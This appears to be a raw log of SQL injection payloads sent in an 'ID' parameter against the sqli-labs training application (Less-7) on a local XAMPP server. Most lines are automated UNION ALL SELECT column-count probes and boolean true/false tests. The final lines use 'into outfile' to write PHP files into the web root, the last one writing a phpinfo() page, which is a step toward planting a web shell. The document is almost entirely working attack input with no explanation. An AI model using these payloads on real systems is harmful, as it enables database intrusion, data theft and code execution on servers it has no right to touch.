ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:-4845') UNION ALL SELECT 1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583#
ID:-7811') UNION ALL SELECT 4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106,4106#
ID:-3669') UNION ALL SELECT 4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992,4992#
ID:-6948') UNION ALL SELECT 9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907,9907#
ID:-8456') UNION ALL SELECT 2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236,2236#
ID:-5543') UNION ALL SELECT 2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124,2124#
ID:-7901') UNION ALL SELECT 4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788,4788#
ID:-6326') UNION ALL SELECT 6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229,6229#
ID:-8133') UNION ALL SELECT 6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823,6823#
ID:-6628') UNION ALL SELECT 6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026,6026#
ID:-1962') UNION ALL SELECT 2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434#
ID:-5735') UNION ALL SELECT 2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313,2313#
ID:-9889') UNION ALL SELECT 6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963,6963#
ID:-4258') UNION ALL SELECT 5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441,5441#
ID:-4385') UNION ALL SELECT 7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940#
ID:-3536') UNION ALL SELECT 7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771,7771#
ID:-3530') UNION ALL SELECT 9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190,9190#
ID:-5386') UNION ALL SELECT 4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132,4132#
ID:-9161') UNION ALL SELECT 5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725,5725#
ID:1') AND 18=18 AND ('ZXMD'='ZXMD
ID:1') AND 18=59 AND ('jhna'='jhna
ID:1') AND 59=36 AND ('HTHs'='HTHs
ID:1') AND 36=36 AND ('tUEe'='tUEe
ID:1') AND 4705=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4705 AND ('SgfC'='SgfC
ID:1') AND 3803>3802 AND ('pfIU'='pfIU
ID:1')) union select 1,2,3 into outfile '/Applications/XAMPP/xamppfiles/htdocs/www.8.com/sqli-labs/Less-7/poc2.php' and (('1'='1
ID:1')) union select 1,2,3 into outfile '/Applications/XAMPP/xamppfiles/htdocs/www.8.com/sqli-labs/Less-7/poc2.php'-- 
ID:1')) union select 1,2,3 into outfile '/Applications/XAMPP/xamppfiles/htdocs/www.8.com/sqli-labs/Less-7/poc2.php'-- 
ID:1')) union select 1,2,3 into outfile '/Applications/XAMPP/xamppfiles/htdocs/www.8.com/sqli-labs/Less-7/poc2.php'-- 
ID:1')) union select 1,2,3 into outfile '/Applications/XAMPP/xamppfiles/htdocs/www.8.com/sqli-labs/Less-7/poc2.php'-- 
ID:1')) union select 1,2,3 into outfile '/Applications/XAMPP/xamppfiles/htdocs/www.8.com/sqli-labs/Less-7/poc2.php'-- 
ID:1')) union select 1,'<?php phpinfo(); ?>',3 into outfile '/Applications/XAMPP/xamppfiles/htdocs/www.8.com/sqli-labs/Less-7/poc3.php'-- 
